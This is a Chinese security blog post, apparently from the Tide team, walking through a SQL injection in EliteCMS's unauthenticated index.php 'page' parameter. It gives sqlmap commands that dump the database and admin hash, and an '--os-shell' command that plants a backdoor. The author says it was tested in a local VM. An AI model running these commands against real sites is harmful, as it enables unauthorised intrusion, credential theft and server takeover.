ellite sql注入
2023-5-6 00:44:2 Author: 白帽子(查看原文) 阅读量:27 收藏

本地环境搭建:

官网下载:http://www.elitecms.net/

安装步骤:

前台效果:


后台效果:


代码分析

安装完以后,直接产看代码的文件,全局正则匹配select .*? where


快速通读下代码上下文,这里没有加过滤。接着搜索哪里调用了这个函数。


这里有调用,而且没有过滤,直接访问页面,抓包。

无需用户登录直接访问URL:http://www.elitecms.com/index.php?page=1


手动在page中构建payload,在page=1后面直接加个单引号,进行验证。
访问后,数据库返回来页面错误


很明显这里有注入,用SQLmap跑一下数据库信息

sqlmap命令:sqlmap -u “http://www.elitecms.com/index.php?page=1" –current-db –batch

数据库名信息:


然后使用下面这个命令获取数据库表信息

sqlmap -u “http://www.elitecms.com/index.php?page=1" -D elitecms –tables  –batch:

然后使用下面这个命令获取用户表里的字段信息:

sqlmap -u “http://www.elitecms.com/index.php?page=1" -D elitecms -T users –columns  –batch

最后获得管理员用户信息,使用下面命令:


通过上面的hash值,借助第三方平台拿下明文密码:


此时进入系统后台:


拿下系统后台权限,可以使用后台的全部功能。

接着通过—os-shell的选项,拿下服务权限,命令如下:sqlmap -u “http://www.elitecms.com/index.php?page=1" –os-shell,

在过程中填写路径的时候,填上我们的实际路径就好,如下图所示:


选择2,在下面填写路径,最后结果返回系统shell,同时创建了后门文件。通过shell执行系统命令:


也可访问后门文件:



至此,通过前台文件index.php,无需用户登录,实现了拿系统后台权限,和服务器权限。造成了非常严重的后果。全过程都在本地虚拟机中进行的测试,域名也是解析的本地解析。

E

N

D

Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室。团队公众号自创建以来,共发布原创文章400余篇,自研平台达到31个,目有18个平台已开源。此外积极参加各类线上、线下CTF比赛并取得了优异的成绩。如有对安全行业感兴趣的小伙伴可以踊跃加入或关注我们


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246679&idx=2&sn=e9c7967eb31153bff2ce0fb12c3d8419&chksm=82ea55beb59ddca8326287634842d5b54b49cc816df0d3585a5d1ea642134b9463e375d95ea3#rd
如有侵权请联系:admin#unsafe.sh